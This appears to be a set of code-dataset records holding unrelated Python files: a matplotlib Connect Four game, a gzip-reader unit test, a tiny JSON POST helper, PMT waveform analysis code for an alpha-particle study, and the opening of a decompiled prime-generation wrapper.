It is called every time a move is made.\r\n Annoyingly, this wouldn't work outside of the Game class.\"\"\"\r\n update = open('new.txt', 'w')\r\n row = 0\r\n while row < ROWS:\r\n col = 0\r\n while col < COLS:\r\n item = self.board.board[(ROWS-1)-row][col]\r\n if item == -1:\r\n item = 'red'\r\n elif item == 1:\r\n item = 'yellow'\r\n else:\r\n item = 'w'\r\n update.write(\"{},{},{}\\n\".format(col + 1, row + 1, item))\r\n col += 1\r\n row += 1\r\n update.close()\r\n \r\n def play(self):\r\n \"\"\"\"Main method responisble for the game.\"\"\"\r\n while not self.game_over():\r\n #print(self.board)\r\n self.update_display_file() # ***\r\n update() # ***\r\n column = self.current_player.get_move(self.board)\r\n self.board.change_board(column, self.current_player.symbol)\r\n self.next_player()\r\n #print('\\n' + '='*29) # Board can be printed to the console\r\n #print(self.board)\r\n print('='*29)\r\n self.update_display_file() # ***\r\n update() # ***\r\n if self.is_won():\r\n self.winner().name\r\n if self.is_draw():\r\n print(\"Nobody wins! How exciting... you must both be evenly matched.\")\r\n else:\r\n print(\"{} wins! Good job buddy!\".format(self.current_player.name))\r\n plt.show() # Keeps the display from just randomly closing after the line is drawn.\r\n \r\n def game_over(self):\r\n \"\"\"Decides the current state of the game. Returns True if the game is\r\n either won or drawn, else returns False.\"\"\"\r\n return self.is_won() or self.is_draw()\r\n \r\n def is_won(self):\r\n \"\"\"Determines whether game is won. Returns a boolean.\"\"\"\r\n return self.board.is_win(4)\r\n \r\n def is_draw(self):\r\n \"\"\"Determines whether the game is a draw. Returns a boolean.\"\"\"\r\n full = True\r\n for column in range(COLS):\r\n if not self.board.is_full(column):\r\n full = False\r\n break\r\n return not self.is_won() and full\r\n \r\n def next_player(self):\r\n \"\"\"Changes the current player to the next player.\"\"\"\r\n if self.current_player == self.player1:\r\n self.current_player = self.player2\r\n else:\r\n self.current_player = self.player1\r\n \r\n def winner(self):\r\n \"\"\"Gets the winner.\"\"\"\r\n self.next_player()\r\n return self.current_player\r\n \r\n \r\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ \r\n# =================================================================================================\r\n# INITIALIZER AND EXTRAS\r\n# The display section of code is a bit of a mess, because I couldn't get the\r\n# animation module of matplot to work inside of a function.\r\n# =================================================================================================\r\n# +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n\r\n# =============================================================================\r\n# USER PARAMETERS\r\n# This section grabs all the info from the user about board size.\r\n# =============================================================================\r\n\r\ndef get_user_parameters():\r\n \"\"\"Asks the user for parameters:\r\n - Human vs Human, or Human vs Machine\r\n - Stupid Machine or Smart Machine (difficulty level)\r\n - Player 1 name\r\n - Player 2 name\r\n - Board size\r\n - Tokens to win\r\n \"\"\"\r\n # 1.\r\n first = False\r\n human_or_machine = str.upper(raw_input(\"Are you playing with a friend (Y/N)? 
\"))\r\n # AI or not\r\n while human_or_machine != 'Y' and human_or_machine != 'N':\r\n print(\"\\nIt seems you cannot follow simple instructions. Enter either a 'Y' or a 'N'.\")\r\n human_or_machine = str.upper(raw_input(\"Are you playing with a friend (Y/N)? \"))\r\n # Human \r\n if human_or_machine == 'Y':\r\n response = (\"\\nI'm not quite sure how you managed to convince another living person to play \"\r\n \"this game with you. You must both be equally lonely...\\n\")\r\n player1 = raw_input(response + \"\\nPlease enter the name of player 1. \")\r\n player2 = raw_input(\"\\nPlease enter the name of player 2. \")\r\n # AI \r\n elif human_or_machine == 'N':\r\n response = (\"\\nSo sad that you have no friends to play with. Although, you are playing a \"\r\n \"very low-budget version of Connect Four, so I shouldn't be surprised...\\n\")\r\n print(response)\r\n # Move first or second\r\n first_second = (raw_input(\"Do you want to move 1st or 2nd (1/2)? \"))\r\n while first_second != '1' and first_second != '2':\r\n print(\"\\nIt seems you cannot follow simple instructions. Enter either a '1' or a '2'.\") \r\n first_second = str.upper(raw_input(\"Do you want to move 1st or 2nd (1/2)? \"))\r\n if first_second == '1':\r\n first = True \r\n # Player name\r\n player1 = input(\"Please enter your name. \")\r\n difficulty_selection = (\"\\nOK, so there are basically two difficulty settings for this game: \"\r\n \" 0 and 1. Setting 0 puts you against a machine player that will \"\r\n \"pick a position entirely at random. Seriously, if you lose at this \"\r\n \"difficulty, you should rethink your life. Setting 1 puts you \"\r\n \"against a player that basically doesn't play like Forrest Gump. \"\r\n \"Although, he WAS surprisingly good at ping-pong. It is unlikely \"\r\n \"that you will win. Anyway, which \"\r\n \"setting would you like to go with (0/1)? \")\r\n print(difficulty_selection)\r\n result = False\r\n while result is False:\r\n try:\r\n player2 = int(raw_input())\r\n if not (player2 == 0 or player2 == 1):\r\n raise ValueError\r\n result = True\r\n except ValueError:\r\n print(\"\\nEnter '0' for easy and '1' for hard, not 'whatever you feel like.' \")\r\n # Board size \r\n cols = raw_input(\"\\nOK, just one last thing. I need to know the size of the board that you want to \"\r\n \"play on. The stanadard board size is 7 columns by 6 rows, but you can really \"\r\n \"enter as many as you want up to 15. So, how many colummns do you want? \") \r\n while not cols.isnumeric():\r\n cols = raw_input(\"\\nYeah, so whatever that was, it sure as hell wasn't a valid number. \"\r\n \"Please enter the number of columns that you want in INTEGER FORM. \")\r\n while not 0 < int(cols) < 16:\r\n cols = raw_input(\"\\nCome on stop messing around. Pick a number between 1 and 15. \")\r\n \r\n rows = raw_input(\"\\nAnd how many rows do you want? \")\r\n while not rows.isnumeric():\r\n rows = input(\"\\nYeah, so whatever that was, it sure as hell wasn't a valid number. \"\r\n \"Please enter the number of rows that you want in INTEGER FORM. \")\r\n while not 0 < int(rows) < 16:\r\n rows = raw_input(\"\\nYou need to pick a number between 1 and 15. 
\")\r\n \r\n print(\"\")\r\n \r\n return player1, player2, int(cols), int(rows), first\r\n \r\n \r\ndef user_params():\r\n \"\"\"Instantiates the players, board, and sets up the game.\"\"\"\r\n p1, p2, cols, rows, first = get_user_parameters()\r\n if type(p2) is int:\r\n if p2 == 0:\r\n player2 = StupidMachinePlayer('Forrest', 'B')\r\n else:\r\n player2 = NonStupidMachinePlayer('Albert', 'B')\r\n else:\r\n player2 = HumanPlayer(p2, 'B')\r\n player1 = HumanPlayer(p1, 'R') \r\n board = Board(cols, rows)\r\n if first is False:\r\n player1, player2 = player2, player1\r\n game = Game(player1, player2, board) \r\n return cols, rows, game\r\n\r\nglobal COLS, ROWS, GAME # This is horrible practice, I know, but I couldn't really find\r\nCOLS, ROWS, GAME = user_params() # another way to do this. Placement also had to be specific to\r\n # avoid reference errors. \r\n\r\n\r\n# =============================================================================\r\n# PLOTTING THE GAME BOARD\r\n# Calls the FuncAnimation method from matplotlibs animation library. To be perfectly honest, I'm \r\n# still not 100% sure how it works, but it does, so that's nice. Interestingly, this code also works\r\n# with collecting data in real time from some other source, and updating a display.\r\n# =============================================================================\r\n\r\nfig = plt.figure(figsize=(COLS+1,ROWS)) # Sets up the graph. The figure size will expand with\r\nax1 = fig.add_subplot(1,1,1) # the number of rows and columns.\r\n\r\ndef animate(i): \r\n \"\"\"Main function that creates the graph. Essentially, it takes all of the data from a saved\r\n file and plots them to a scatter plot. Each point has one attribute: color.\"\"\"\r\n graph_data = open('new.txt', 'r').read()\r\n lines = graph_data.split('\\n')\r\n xs = []\r\n ys = []\r\n zs = []\r\n for line in lines:\r\n if len(line)>1:\r\n x, y, z = line.split(',')\r\n xs.append(float(x) + 0.5)\r\n ys.append(float(y) + 0.5)\r\n zs.append(z)\r\n ax1.clear()\r\n plt.xlim(1, COLS+1)\r\n plt.ylim(1, ROWS+1)\r\n ax1.set_facecolor('blue')\r\n ax1.scatter(xs, ys, s=2500, c=zs, linestyle='None')\r\n if GAME.is_won(): # Plot the winning line.\r\n a, b = update_final_win() # Head over to the section responsible for\r\n plt.plot(a, b, linestyle='-', color='k', lw=5)\r\n winner = GAME.current_player.name\r\n plt.title(s=\"{}, wins!\".format(winner))# Plot winner.\r\n \r\ndef update():\r\n \"\"\"Function responsible for updating the graph in real time.\"\"\"\r\n ani = animation.FuncAnimation(fig, animate, interval=1000) # This should display the yellow\r\n fig.canvas.draw() # warning symbol. Not sure why...but\r\n plt.pause(0.01) # it still seems to work.\r\n \r\n \r\n# =============================================================================\r\n# GETTING INFO AFTER A WIN\r\n# Grabs all the info about the win. 
The main function is update_final_win() with the remaining three\r\n# being the helper functions.\r\n#\r\n# The functions repsonsible for getting the rows, columns\r\n# and traces were all slightly different that made them difficult to abstract into one function.\r\n# =============================================================================\r\n \r\n\r\ndef update_final_win():\r\n \"\"\"Grabs the coordinates from the arrays, and converts them into actual coordinates to be\r\n plotted on the graph.\"\"\"\r\n rows = get_win_row() # Call to the helper functions\r\n cols = get_win_col()\r\n trace = get_win_trace()\r\n if rows is not None:\r\n row, column = rows\r\n x_i = column + 1.5\r\n x_f = x_i + 3\r\n y_i = (ROWS - row) + 0.5\r\n a = [x_i, x_f] # Start point\r\n b = [y_i, y_i] # End point\r\n return a, b\r\n elif cols is not None:\r\n row, column = cols\r\n y_i = (ROWS - row) + 0.5\r\n y_f = y_i - 3\r\n x_i = column + 1.5\r\n a = [x_i, x_i]\r\n b = [y_i, y_f]\r\n return a, b\r\n else:\r\n row, column, flipped = trace # We have to know whether we looking at a normal trace, or\r\n if flipped is False: # the trace of the flipped matrix\r\n x_i = column + 1.5\r\n x_f = x_i + 3\r\n y_i = (ROWS - row) + 0.5\r\n y_f = y_i - 3\r\n else:\r\n x_f = column + 1.5\r\n x_i = x_f - 3\r\n y_f = (ROWS - row) + 0.5\r\n y_i = y_f - 3\r\n a = [x_i, x_f]\r\n b = [y_i, y_f]\r\n return a, b\r\n \r\ndef get_win_row():\r\n \"\"\"Cuts the array into sub-arrays in order to search row by row, returns the coordinates as they\r\n are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size) \r\n target1 = 4 # Looking for both red disks and yellow disks.\r\n target2 = -4\r\n win = None\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n for row in sub:\r\n if sum(row) == target1 or sum(row) == target2:\r\n c = col_count\r\n r = row_count\r\n row_index = c//(COLS - sub_size + 1) + r \r\n col_index = c % (COLS - sub_size + 1)\r\n win = (row_index, col_index)\r\n row_count += 1\r\n col_count += 1\r\n return win\r\n\r\ndef get_win_col():\r\n \"\"\"Cuts the array into sub-arrays in order to search column by column, returns the coordinates \r\n as they are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size)\r\n target1 = 4\r\n target2 = -4\r\n win = None\r\n col_count = 0\r\n for sub in sub_boards:\r\n row_count = 0\r\n trans = sub.transpose()\r\n for row in trans:\r\n if sum(row) == target1 or sum(row) == target2:\r\n c = col_count\r\n r = row_count\r\n row_index = c // (COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1) + r\r\n win = row_index, col_index\r\n row_count += 1\r\n col_count += 1\r\n return win\r\n\r\ndef get_win_trace():\r\n \"\"\"Cuts the array into sub-arrays in order to search the trace of the arrays, and the traces\r\n of the flipped arrays, returns coordinates as they are in the array system.\"\"\"\r\n sub_size = 4\r\n sub_boards = GAME.board.create_sub_arrays(sub_size)\r\n target1 = 4\r\n target2 = -4\r\n sub_count = 0\r\n for sub in sub_boards: \r\n if np.trace(sub) == target1 or np.trace(sub) == target2: \r\n c = sub_count\r\n row_index = c//(COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1)\r\n return row_index, col_index, False\r\n flipped = np.fliplr(sub)\r\n if np.trace(flipped) == target1 or np.trace(flipped) == target2:\r\n c = sub_count\r\n c = sub_count\r\n row_index = c//(COLS - sub_size + 1)\r\n col_index = c % (COLS - sub_size + 1) + 3\r\n return row_index, 
col_index, True\r\n sub_count += 1\r\n \r\n \r\n# =============================================================================\r\n# INITIALIZER\r\n# create_game() is the main function that sets the ball rolling.\r\n# =============================================================================\r\n \r\ndef create_game():\r\n \"\"\"This function is responsible for starting everything up.\"\"\"\r\n save_file = open('new.txt', 'w+') # Create new savefile \r\n for row in range(1, ROWS+1):\r\n for col in range(1, COLS+1):\r\n save_file.write('{},{},w\\n'.format((col), (row))) # Fill the save file with the rows\r\n save_file.close() # and give all data points the\r\n GAME.update_display_file() # the attribute of whiteness.\r\n update() # Also grabs user parameters, and\r\n GAME.play() # creates the 'graph'.\r\n\r\ncreate_game() # Fire it up!\r\n\r\n \r\n# =============================================================================\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Connect4.py","file_name":"Connect4.py","file_ext":"py","file_size_in_byte":29744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420035494","text":"from unittest import TestCase\nimport configparser\nfrom stream_reader import gz_reader\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\n\nclass TestGzReader(TestCase):\n def setUp(self) -> None:\n self.gz_reader = gz_reader.GzReader()\n\n def test_read(self):\n \"\"\"\n gunzip takes 1.437s\n this takes only 0.09s\n\n stream reading the gz\n\n :return:\n \"\"\"\n gz_file = config[\"PATHS\"][\"one_pubmed_gz\"]\n MAX_LINES = 10\n for line_num, content in enumerate(self.gz_reader.read(gz_file), start=1):\n if line_num >= MAX_LINES:\n break\n else:\n print(\"{}: {}\".format(line_num, content))\n\n def test_read_stream(self):\n some_bytes = b'\\x1f\\x8b\\x08\\x08\\xd8R\\x0f\\\\\\x00\\x03'\n print(\"\"\"\n raw: {}\n decompressed: {}\n \"\"\".format(\n some_bytes,\n self.gz_reader.read_stream(some_bytes)\n ))\n # self.fail()\n\n def test_read_obs_stream(self):\n one_pubmed_gz_obs = config['PATHS']['one_pubmed_gz_obs_key']\n MAX_LINES = 10\n for line_num, content in enumerate(\n self.gz_reader.read_obs_line(one_pubmed_gz_obs), start=1):\n if line_num > MAX_LINES:\n break\n else:\n print(\"{}: {}\".format(line_num, content))\n\n pubmed_lines = list(self.gz_reader.read_obs_line(one_pubmed_gz_obs))\n print(\"num of pubmeds: [{}]\".format(len(pubmed_lines)))\n\n # self.fail()\n","sub_path":"stream_reader/test_gzReader.py","file_name":"test_gzReader.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"616728671","text":"import urllib2\nimport json\n\nif __name__ == '__main__':\n url = 'http://192.168.0.20:8080/ServiceMgr/hello'\n body = {'flag': 'test','ss': 'nice'}\n body = json.dumps(body)\n http_req = urllib2.Request(url=url,data=body)\n http_req.add_header('Content-type', 'application/json')\n urllib2.urlopen(http_req)\n","sub_path":"SliceO/ext/http/httphelper.py","file_name":"httphelper.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"420257879","text":"from __future__ import print_function\nimport time\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport tables as tb\nimport numpy as np\nimport mplFunctions as mpl\nimport wfmFunctions as wfm\nimport sensorFunctions as snf\nfrom Util import *\nimport 
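# --- editor's sketch: a stdlib equivalent of the gz streaming tested above ---
# GzReader reads a .gz line by line instead of gunzipping it first; the
# standard library streams the same way, inflating only what is consumed:
import gzip

def read_gz_lines(path, max_lines=10):
    with gzip.open(path, 'rt', encoding='utf-8') as fh:
        for line_num, line in enumerate(fh, start=1):
            if line_num > max_lines:
                break
            yield line.rstrip('\n')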
FEParam as FP\nfrom scipy import signal as SGN\n\nimport logging\nimport sys\nlogger = logging.getLogger()\nlogger.handlers[0].stream = sys.stdout\nlogger.setLevel(logging.DEBUG)\npes = 1\n\ndef alpha(pmtrwf,pmtdf, geomdf, thr_pmt=10*pes, thr_sipm=4*pes,\n t_trigger = 600, thr_s1 = 30*pes, thr_s2 = 5000*pes,\n log='INFO', plot=False, event_list=[2]):\n \"\"\"\n alpha analysis\n \"\"\"\n lg = 'logging.'+DEBUG\n logger.setLevel(eval(lg))\n\n evl = len(event_list)\n t0 = np.zeros(evl, dtype=np.float32)\n t = np.zeros(evl, dtype=np.float32)\n xb = np.zeros(evl, dtype=np.float32)\n yb = np.zeros(evl, dtype=np.float32)\n s2e = np.zeros(evl, dtype=np.float32)\n s2l = np.zeros(evl, dtype=np.float32)\n ns1 = np.zeros(evl, dtype=np.int32)\n ns2 = np.zeros(evl, dtype=np.int32)\n\n for event in event_list:\n logger.info('event = {}'.format(event))\n\n PMT, BSL = waveform_panel(pmtrwf,pmtdf,event=event)\n if plot:\n plot_PPMT(PMT, tmin=0, tmax=1000, emin = -10, emax = 20, option='all')\n plt.show()\n wait()\n plot_PPMT(PMT, tmin=0, tmax=1000, emin = -10, emax = 150, option='sum')\n plt.show()\n wait()\n\n s12 = find_S12(wf_thr(sPMT(PMT),threshold=thr_pmt))\n\n logger.debug('length of s12 = {}'.format(len(s12)))\n S1 = []\n S2 = []\n for s in s12:\n logger.debug('evaluating s in s12: s ={}'.format(s.describe()))\n logger.debug('tmax ={}'.format(s.describe().time_mus.max()))\n if s.describe().time_mus.max() < t_trigger: #s1\n S1.append(s)\n else:\n S2.append(s)\n\n logger.debug('length of S1 list = {}'.format(len(S1)))\n logger.debug('length of S2 list = {}'.format(len(S2)))\n\n if (len(S1) == 0):\n logger.warning(\"S1 not found, ignore event\")\n t0[event] = -999\n t[event] = -999\n xb[event] = -999\n yb[event] = -999\n s2e[event] = -999\n s2l[event] = -999\n ns1[event] = 0\n ns2[event] = len(S2)\n continue\n if (len(S2) == 0):\n logger.warning(\"S2 not found, ignore event\")\n t0[event] = -999\n t[event] = -999\n xb[event] = -999\n yb[event] = -999\n s2e[event] = -999\n s2l[event] = -999\n ns1[event] = len(S1)\n ns2[event] = 0\n continue\n\n ns1[event] = len(S1)\n ns2[event] = len(S2)\n\n s1 = S1[0]\n\n if len(S1) > 1:\n cmax = 0\n i=0\n imax = 0\n for s in S1:\n if s.describe().time_mus.count() > cmax:\n cmax = s.describe().time_mus.count()\n imax = i\n i+=1\n s1 = S1[imax]\n\n logger.debug('found s1 = {}'.format(s1.describe()))\n\n\n\n s2 = S2[0]\n es2 = s12_energy(s2)\n\n if len(S2) > 1:\n emax = 0\n i=0\n imax = 0\n for s in S2:\n es2 = s12_energy(s)\n if es2 > emax:\n emax = es2\n imax = i\n i+=1\n s2 = S2[imax]\n\n epmt = energy_sum(PMT, thr=0)\n\n logger.debug('found s2 = {}'.format(s2.describe()))\n\n t0[event] = find_t0(s1)\n t[event] = find_t(s1,s2)\n xb[event], yb[event] = pmt_barycenter(pmtdf, epmt)\n s2l[event] = s12_length(s2)\n\n\n\ndef get_vectors(h5f):\n \"\"\"\n input: file pointer\n returns: data vectors\n \"\"\"\n pmtrwf = h5f.root.RD.pmtrwf\n sipmrwf = h5f.root.RD.sipmrwf\n geom_t = h5f.root.Detector.DetectorGeometry\n pmt_t = h5f.root.Sensors.DataPMT\n sipm_t = h5f.root.Sensors.DataSiPM\n gdf = snf.read_data_geom(geom_t)\n pmtdf = snf.read_data_sensors(pmt_t)\n sipmdf = snf.read_data_sensors(sipm_t)\n return pmtrwf,sipmrwf,pmtdf,sipmdf,gdf\n\ndef get_pmt_vectors(h5f):\n \"\"\"\n input: file pointer\n returns: data vectors\n \"\"\"\n pmtrwf = h5f.root.RD.pmtrwf\n geom_t = h5f.root.Detector.DetectorGeometry\n pmt_t = h5f.root.Sensors.DataPMT\n gdf = snf.read_data_geom(geom_t)\n pmtdf = snf.read_data_sensors(pmt_t)\n return pmtrwf,pmtdf,gdf\n\ndef wfdf(time,energy_pes,indx):\n 
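# --- editor's note: a bug in alpha() above ---
# `lg = 'logging.'+DEBUG` raises NameError (DEBUG is undefined); the intent
# appears to be the `log` argument ('INFO', 'DEBUG', ...). getattr on the
# logging module performs the same lookup without eval():
import logging

def set_level_from_name(logger, level_name='INFO'):
    logger.setLevel(getattr(logging, level_name.upper(), logging.INFO))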
\"\"\"\n takes three vectors (time, energy and indx) and returns a data frame representing a waveform\n \"\"\"\n swf = {}\n swf['time_mus'] = time/mus\n swf['ene_pes'] = energy_pes\n swf['indx'] = indx\n return pd.DataFrame(swf)\n\ndef waveform_panel(pmtrwf,pmtdf,mau_len = 500, calib_constat =True, adc_to_pes=20,\n type = 'PMT', daq_ceiling=4096, event=0):\n \"\"\"\n input: sensor (pmt or sipm) data vector, sensor data frame (position, calibration)\n returns: a panel holding DataFrames with waveforms for all sensors, and a series for the baselines\n \"\"\"\n PMT = {}\n nm = mau_len\n B_MAU = (1./nm)*np.ones(nm)\n pmt_len = pmtrwf.shape[2]\n NPMT = pmtrwf.shape[1]\n MAU = np.zeros(nm)\n BSL = {}\n\n time_ns = np.arange(pmt_len)*mus\n indx = np.arange(pmt_len)\n\n if type == 'PMT':\n time_ns = np.arange(pmt_len)*FP.time_DAQ\n\n ene_sum = 0\n for j in range(NPMT):\n\n if calib_constat == True:\n adc_to_pes = abs(pmtdf['adc_to_pes'][j])\n\n signal_daq = pmtrwf[event,j]\n if type == 'PMT':\n signal_daq = daq_ceiling - pmtrwf[event,j]\n\n MAU[0:nm] = SGN.lfilter(B_MAU,1, signal_daq[0:nm])\n BASELINE = MAU[nm-1]\n\n ene_pes = (signal_daq - BASELINE)/adc_to_pes\n if type == 'PMT':\n ene_sum += ene_pes\n\n PMT[j] = wfdf(time_ns,ene_pes,indx)\n BSL[j] = BASELINE\n PMT[j+1] = wfdf(time_ns,ene_sum,indx)\n return pd.Panel(PMT),pd.Series(BSL)\ndef plot_PPMT(pmt_panel, tmin=0, tmax=1200, emin = 0, emax = 10000, option='sum'):\n \"\"\"\n Plots pmtwf\n \"\"\"\n plt.figure(figsize=(10,10))\n\n if option == 'sum':\n ax1 = plt.subplot(1,1,1)\n ax1.set_xlim([tmin, tmax])\n ax1.set_ylim([emin, emax])\n indx = pmt_panel.items[-1]\n pmtwf = pmt_panel[indx]\n plt.plot(pmtwf['time_mus'],pmtwf['ene_pes'])\n else:\n\n for i in pmt_panel.items[0:-1]:\n ax1 = plt.subplot(3,4,int(i)+1)\n ax1.set_xlim([tmin, tmax])\n ax1.set_ylim([emin, emax])\n\n pmtwf = pmt_panel[i]\n plt.plot(pmtwf['time_mus'],pmtwf['ene_pes'])\n\n plt.show()\ndef wf_thr(wf,threshold=0):\n \"\"\"\n return a zero supressed waveform (more generally, the vaules of wf above threshold)\n \"\"\"\n return wf.loc[lambda df: df.ene_pes.values >threshold, :]\ndef energy_sum(sensor_panel, thr=0):\n \"\"\"\n Sum the WFs of PMTs and SiPMs (MC) and store the total energy in PES\n \"\"\"\n EPES = []\n\n for i in sensor_panel.items[0:-1]:\n pmtwf = sensor_panel[i]\n EPES.append(np.sum(pmtwf.ene_pes.values[np.where(pmtwf.ene_pes.values>thr)]))\n return pd.Series(EPES)\ndef plot_sensors(geom_df,sensor_df, energy, radius=10):\n \"\"\"\n plots the energy of the sensors\n \"\"\"\n x =sensor_df['x'].values\n y =sensor_df['y'].values\n r =np.ones(len(sensor_df['x'].values))*radius\n\n plt.figure(figsize=(10,10))\n ax = plt.subplot(aspect='equal')\n mpl.circles(x, y, r, c=energy, alpha=0.5, ec='none')\n plt.colorbar()\n\n plt.xlim(geom_df['xdet_min'],geom_df['xdet_max'])\n plt.ylim(geom_df['ydet_min'],geom_df['ydet_max'])\ndef find_S12(swf, stride=40):\n \"\"\"\n Find S1 or S2 signals. The input is a zero-supressed WF. 
The stride defines the contiguity criterium.\n The stride is applied to the indexes which keep the ordering of the original (non-zs) WF.\n For example, with a stride of 40 (corresponding to steps of 1 mus for a DAQ timing of 25 ns) index 1\n and index 39 are in the same S12.\n \"\"\"\n T = swf['time_mus'].values\n P = swf['ene_pes'].values\n I = swf['indx'].values\n\n S12 = {}\n pulse_on = 1\n j=0\n\n S12[0] = []\n S12[0].append([T[0],P[0],I[0]])\n\n for i in range(1,len(swf)) :\n if swf.index[i]-stride > swf.index[i-1]: #new s12\n j+=1\n S12[j] = []\n S12[j].append([T[i],P[i],I[i]])\n else:\n S12[j].append([T[i],P[i],I[i]])\n\n S12L=[]\n for i in S12.keys():\n S12L.append(pd.DataFrame(S12[i], columns=['time_mus','ene_pes','indx']))\n return S12L\ndef rebin_waveform(swf, stride = 40):\n \"\"\"\n rebins the a waveform according to stride\n The input waveform is a vector such that the index expresses time bin and the\n contents expresses energy (e.g, in pes)\n The function returns a DataFrame. The time bins and energy are rebinned according to stride\n \"\"\"\n\n t = swf['time_mus'].values\n e = swf['ene_pes'].values\n I = swf['indx'].values\n n = len(swf)/int(stride)\n r = len(swf)%int(stride)\n\n lenb = n\n if r > 0:\n lenb = n+1\n\n T = np.zeros(lenb)\n E = np.zeros(lenb)\n II = np.zeros(lenb, dtype=int)\n\n j=0\n for i in range(n):\n E[i] = np.sum(e[j:j+stride])\n T[i] = np.mean(t[j:j+stride])\n II[i] = I[(j+stride)/2]\n j+= stride\n\n if r > 0:\n E[n] = np.sum(e[j:])\n T[n] = np.mean(t[j:])\n II[n] = I[(len(swf) - j/2)]\n\n\n rbw={}\n rbw['ene_pes'] = E\n rbw['time_mus'] = T\n rbw['indx'] = II\n return pd.DataFrame(rbw)\ndef find_t0(s1):\n \"\"\"\n returns t0\n \"\"\"\n emax = np.amax(s1.ene_pes.values)\n return s1.loc[lambda df: df.ene_pes.values ==emax, :]\ndef s12_energy(s12):\n \"\"\"\n total energy in pes\n \"\"\"\n return np.sum(s12.ene_pes.values)\ndef s12_length(s12):\n \"\"\"\n s2 length in mus\n \"\"\"\n\n return s12.describe().time_mus['max'] - s12.describe().time_mus['min']\ndef s12_peak(s12):\n \"\"\"\n s2 peak in mus\n \"\"\"\n\n return s12.describe().time_mus['max'], s12.describe().ene_pes['max']\ndef find_t(s1,s2):\n \"\"\"\n returns the time of the interaction\n \"\"\"\n t0 = find_t0(s1).time_mus.values[0]\n ts2,es2 = s12_peak(s2)\n return ts2 - t0\ndef pmt_barycenter(geom_df,sensor_df, energy):\n \"\"\"\n plots the energy of the sensors\n \"\"\"\n x =sensor_df['x'].values\n y =sensor_df['y'].values\n etot = np.sum(energy)\n xb = np.dot(x,energy)/etot\n yb = np.dot(y,energy)/etot\n\n return xb,yb\n\ndef sPMT(pmt_panel):\n return pmt_panel[pmt_panel.items[-1]]\ndef sipm_corona(esipmzs, sipmdf, n=2):\n pitch = 10*mm\n sipm_max = esipmzs.loc[lambda df: df.values == df.describe().max()]\n\n imax = sipm_max.index[0]\n xmax = sipmdf.ix[imax].x\n ymax = sipmdf.ix[imax].y\n\n CRNA = []\n ALL = []\n\n #print('sipmmax = {}, x = {} mm y = {} mm'.format(imax,xmax,ymax))\n xr = np.arange(xmax - n*pitch, xmax + (n+1)*pitch, pitch)\n yr = np.arange(ymax - n*pitch, ymax + (n+1)*pitch, pitch)\n #print('xr = {}, yr ={}'.format(xr,yr))\n\n for isipm in esipmzs.index:\n x = sipmdf.ix[isipm].x\n y = sipmdf.ix[isipm].y\n #print('sipm = {}, x = {} mm y = {} mm'.format(isipm,x,y))\n\n ALL.append(isipm)\n if x in xr and y in yr:\n CRNA.append(isipm)\n\n #print('CRNA = {}'.format(CRNA))\n #print('ALL = {}'.format(ALL))\n\n #left = np.setdiff1d(np.array(ALL),np.array(CRNA))\n #print('left = {}'.format(left))\n\n xb = 0.\n yb = 0.\n etot = 0.\n for i in CRNA:\n x = sipmdf.ix[i].x\n y = 
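# --- editor's sketch: the stride grouping behind find_S12 above ---
# Two zero-suppressed samples belong to the same S1/S2 candidate when their
# original indices are at most `stride` apart. The same grouping on a bare,
# non-empty index list:
def group_pulses(indices, stride=40):
    pulses, current = [], [indices[0]]
    for prev, cur in zip(indices, indices[1:]):
        if cur - prev > stride:  # gap too wide: start a new pulse
            pulses.append(current)
            current = []
        current.append(cur)
    pulses.append(current)
    return pulses

assert group_pulses([1, 5, 39, 200, 210]) == [[1, 5, 39], [200, 210]]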
sipmdf.ix[i].y\n e = esipmzs.ix[i]\n xb += x*e\n yb += y*e\n etot+=e\n\n xb/=etot\n yb/=etot\n #print('xb = {}, yb = {}'.format(xb,yb))\n return xb,yb\n","sub_path":"Notebooks/LSC/alpha_pmt.py","file_name":"alpha_pmt.py","file_ext":"py","file_size_in_byte":11807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"501006216","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/martijndevos/Documents/anydex-core/anydex/../pyipv8/ipv8/attestation/wallet/bonehexact/cryptosystem/cryptography_wrapper.py\n# Compiled at: 2019-06-07 08:10:38\nfrom __future__ import absolute_import\nfrom cryptography.hazmat.backends import default_backend\nfrom .....util import cast_to_bin\n\ndef generate_safe_prime(bit_length, backend=default_backend()):\n \"\"\"\n Generate a 'safe' prime p ((p-1)/2 is also prime).\n\n :param bit_length: the length of the generated prime in bits\n :type bit_length: int\n :param backend: the cryptography backend to use\n :type backend: Backend\n :return: the generated prime\n :rtype: int\n \"\"\"\n generated = backend._lib.BN_new()\n err = backend._lib.BN_generate_prime_ex(generated, bit_length, 1, backend._ffi.NULL, backend._ffi.NULL, backend._ffi.NULL)\n if err == 0:\n backend._lib.BN_clear_free(generated)\n raise RuntimeError('Failed to generate prime!')\n generated_hex = backend._lib.BN_bn2hex(generated)\n out = int(backend._ffi.string(generated_hex), 16)\n backend._lib.OPENSSL_free(generated_hex)\n backend._lib.BN_clear_free(generated)\n return out\n\n\ndef is_prime(number, backend=default_backend()):\n \"\"\"\n Check a number for primality.\n\n :param number: the number to check for primality\n :type number: int\n :param backend: the cryptography backend to use\n :type backend: Backend\n :return: True is the n is expected to be prime, False otherwise\n :rtype: 